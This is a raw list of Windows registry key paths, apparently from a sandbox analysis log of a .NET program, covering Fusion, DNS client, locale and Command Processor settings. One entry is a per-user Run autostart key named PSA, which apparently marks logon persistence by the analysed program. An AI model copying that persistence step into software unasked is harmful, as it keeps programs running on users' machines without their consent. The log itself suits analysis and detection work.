HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PSA HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\1A460378 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\EnableConsoleTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableFileTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableConsoleTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\ConsoleTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\MaxFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileDirectory HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets 